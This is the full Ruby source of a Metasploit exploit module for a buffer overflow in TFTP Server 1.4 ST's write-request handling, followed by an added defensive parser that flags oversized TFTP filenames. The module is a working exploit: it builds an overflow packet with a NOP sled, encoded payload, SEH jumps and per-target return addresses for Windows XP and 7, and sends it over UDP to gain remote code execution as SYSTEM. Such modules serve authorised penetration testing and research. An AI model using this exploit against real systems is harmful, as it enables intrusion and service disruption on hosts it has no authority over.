GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
      'Description'    => %q{
        This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw
        is due to the way TFTP handles the filename parameter extracted from a WRQ request.
        The server will append the user-supplied filename to the TFTP server binary's path
        without any bounds checking, and then attempt to check this path with a fopen().
        Since this isn't a valid file path, fopen() returns null, which allows the
        corrupted data to be used in a strcmp() function, causing an access violation.

        Since the offset is sensitive to how the TFTP server is launched, you must know
        in advance whether your victim machine launched the TFTP as a 'Service' or 'Standalone',
        and then manually select your target accordingly. A successful attempt will lead
        to remote code execution under the context of SYSTEM if run as a service, or
        the user if run as a standalone. A failed attempt will result in a denial-of-service.
      },
      'Author'         =>
        [
          'Mati Aharoni', # Initial discovery, PoC
          'Datacut'       # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2008-1611' ],
          [ 'OSVDB', '43785' ],
          [ 'BID', '18345' ],
          [ 'EDB', '5314' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'           => 600,
          'BadChars'        => "\x00\x2f",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
          # possibly works for other service packs and/or vista
          # Rets = P/P/R from tftpserversp.exe
          [ 'Windows XP SP2/SP3 EN Service Mode',         { 'Ret' => 0x416801, 'Offset' => 1203 } ],
          [ 'Windows XP SP2/SP3 EN Standalone Mode',      { 'Ret' => 0x416801, 'Offset' => 1487 } ],
          [ 'Windows 7 SP0/SP1 EN x64 Service Mode',      { 'Ret' => 0x416801, 'Offset' => 1217 } ],
          [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode',   { 'Ret' => 0x416801, 'Offset' => 1501 } ],
          [ 'Windows 7 SP0/SP1 EN x86 Service Mode',      { 'Ret' => 0x416801, 'Offset' => 1223 } ],
          [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode',   { 'Ret' => 0x416801, 'Offset' => 1507 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-03-26',
      'DefaultTarget'  => 4)) # TFTP is installed as a service

    register_options(
      [
        Opt::RPORT(69)
      ])
  end

  def exploit
    connect_udp

    nops = make_nops(50)
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
    near = "\xe9\x80\xfd\xff\xff"    # jump back 640 bytes to the nop sled
    nseh = "\xeb\xf9" + make_nops(2) # jump back 7 bytes to the long jump

    evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
    mode = "netascii"

    # Send the WRQ packet (header "\x00\x02")
    sploit = "\x00\x02" + evil + "\0" + mode + "\0"

    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end
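The WRQ layout the module builds (2-byte opcode, NUL-terminated filename, NUL-terminated mode) is also what a defender parses to spot the oversized filename this bug depends on. The following is an added example, not part of the Metasploit module or the rapid7 project: a small Ruby parser for TFTP read/write requests that flags suspicious filenames. The length threshold (MAX_FILENAME) and the sample packets are assumptions constructed here, not captured traffic.

```ruby
# Added example: parse TFTP RRQ/WRQ packets and flag abnormal filenames.
TFTP_OPCODES = { 1 => "RRQ", 2 => "WRQ" }.freeze

# Assumed threshold. The smallest offset in the module's target table is
# 1203 bytes, so a sane path limit (here MAX_PATH, 260) sits well below
# the point where the server's unchecked path buffer is overrun.
MAX_FILENAME = 260

# Returns nil for anything that is not an RRQ/WRQ, otherwise a hash with
# :opcode, :filename, :mode, :suspicious and the list of :reasons.
def parse_tftp_request(pkt, max_len = MAX_FILENAME)
  pkt = pkt.b                                # work on raw bytes
  return nil if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1("n")  # 16-bit big-endian opcode
  return nil unless TFTP_OPCODES.key?(opcode)

  # Filename and mode are NUL-terminated; -1 keeps trailing empty fields
  # so we can tell whether the mode string was actually terminated.
  parts = pkt.byteslice(2, pkt.bytesize - 2).split("\0", -1)
  filename = parts[0] || ""
  mode     = parts[1] || ""
  reasons  = []
  reasons << "filename length #{filename.bytesize} exceeds #{max_len}" if filename.bytesize > max_len
  reasons << "non-printable bytes in filename" if filename.each_byte.any? { |b| b < 0x20 || b > 0x7e }
  reasons << "unknown mode #{mode.inspect}" unless %w[netascii octet mail].include?(mode.downcase)
  reasons << "mode string not NUL-terminated" if parts.size < 3

  { opcode: TFTP_OPCODES[opcode], filename: filename, mode: mode,
    suspicious: !reasons.empty?, reasons: reasons }
end

# Constructed sample packets (assumed, not captured traffic).
BENIGN_WRQ = "\x00\x02" + "report.txt" + "\0" + "netascii" + "\0"
LONG_WRQ   = "\x00\x02" + ("A" * 1300)  + "\0" + "netascii" + "\0"

if __FILE__ == $PROGRAM_NAME
  [BENIGN_WRQ, LONG_WRQ].each do |p|
    r = parse_tftp_request(p)
    puts "#{r[:opcode]} len=#{r[:filename].bytesize} suspicious=#{r[:suspicious]} #{r[:reasons].join('; ')}"
  end
end
```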